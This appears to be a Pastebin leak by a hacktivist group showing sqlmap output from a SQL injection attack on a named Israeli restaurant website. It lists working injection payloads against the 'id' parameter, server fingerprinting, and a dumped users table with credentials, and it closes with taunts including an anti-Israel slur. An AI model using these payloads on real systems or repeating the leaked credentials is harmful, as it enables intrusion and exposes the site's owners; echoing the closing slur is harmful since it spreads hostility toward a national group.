Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://www.doronrest.co.il see the #Lulz
- sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
- --------------------------------------------------------------------------------------------------
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=304 AND 2006=2006
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 column
- Payload: id=-9781 UNION ALL SELECT CONCAT(0x716f716c71,0x714b727a436469784a73,0x7164797271)#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: id=304 AND SLEEP(5)
- -----------------------------------------------------------------------------------------------------
- [15:55:10] [INFO] the back-end DBMS is MySQL
- web server operating system: Windows 2008 R2 or 7
- web application technology: ASP.NET, Microsoft IIS 7.5
- back-end DBMS: MySQL 5.0.11
- [15:55:10] [INFO] fetching columns for table 'users' in database 'doronrest'
- [15:55:11] [INFO] the SQL query used returns 4 entries
- [15:55:11] [INFO] retrieved: "id","int(11)"
- [15:55:12] [INFO] retrieved: "name","varchar(255)"
- [15:55:13] [INFO] retrieved: "passward","varchar(255)"
- [15:55:13] [INFO] retrieved: "key_id","varchar(255)"
- [15:55:14] [INFO] fetching entries for table 'users' in database 'doronrest'
- [15:55:14] [INFO] the SQL query used returns 2 entries
- [15:55:15] [INFO] retrieved: "1","0c75de47f6cf0b05901e1fffa90e2356","qwe123",...
- [15:55:16] [INFO] retrieved: "10","2470c408e1afd235854eed75d0050e3d","qwe123"...
- [15:55:16] [INFO] analyzing table dump for possible password hashes
- [15:55:16] [INFO] recognized possible password hashes in column 'key_id'
- [15:55:35] [INFO] starting dictionary-based cracking (md5_generic_passwd)
- [15:55:35] [INFO] starting 2 processes
- =================================================================================================
- Database: doronrest
- Table: users
- [2 entries]
- +----+----------------------------------+--------+----------+
- | id | key_id | name | passward |
- +----+----------------------------------+--------+----------+
- | 1 | 0c75de47f6cf0b05901e1fffa90e2356 | qwe123 | qwe123 |
- | 10 | 2470c408e1afd235854eed75d0050e3d | qwe123 | qwe123 |
- +----+----------------------------------+--------+----------+
- [16:06:55] [INFO] table 'doronrest.users' dumped to CSV file '/tmp/sqlmapdumpMDNAsM/doronrest/users.csv'
- [16:06:55] [INFO] fetched data logged to text files under '/tmp/sqlmapoutputLaSmwO/www.doronrest.co.il'
- [*] shutting down at 16:06:55
- No deberíais habernos esperado amiguitos
- kepp kalm & fuck israhell
- AnonKas
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement